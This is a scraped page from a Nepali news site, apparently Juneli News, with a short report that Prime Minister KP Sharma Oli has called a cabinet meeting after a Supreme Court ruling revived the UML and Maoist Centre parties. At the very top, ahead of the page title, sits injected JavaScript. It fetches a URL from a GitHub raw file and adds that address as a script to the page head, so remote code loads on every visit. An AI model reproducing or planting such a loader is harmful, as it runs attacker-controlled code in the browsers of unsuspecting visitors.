;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्रीले बोलाए मन्त्रिपरिषद बैठक – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्रीले बोलाए मन्त्रिपरिषद बैठक
देश/प्रदेश

प्रधानमन्त्रीले बोलाए मन्त्रिपरिषद बैठक

फागुन २५,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले मन्त्रिपरिषद्को बैठक डाकेका छन् । बैठक आज अपरान्ह् ४ बजे प्रधानमन्त्री ओलीको सरकारी निवास बालुवाटरमा बस्ने छ ।

सर्वोच्च अदालतले नेकपा एमाले र माओवादी केन्द्र ब्युँताउने फैसला गरेलगत्तै पहिलो पटक मन्त्रिपरिषद् बैठक बस्न लागेको हो ।

प्रचण्ड-नेपाल समूहका नेता कार्यकर्ताहरुले आ-आफ्नो पूर्व पार्टीमा क्रियाशील हुने निर्णय गरे पनि ओली पक्षमा रहेका माओवादी नेताहरुले औपचारिक निर्णय गरिसकेका छैनन । तर, केही मन्त्रीले भने आफूहरुले ओली पक्षलाई नछोड्ने बताउँदै आएका छन् ।

फेसबुक प्रतिक्रियाहरु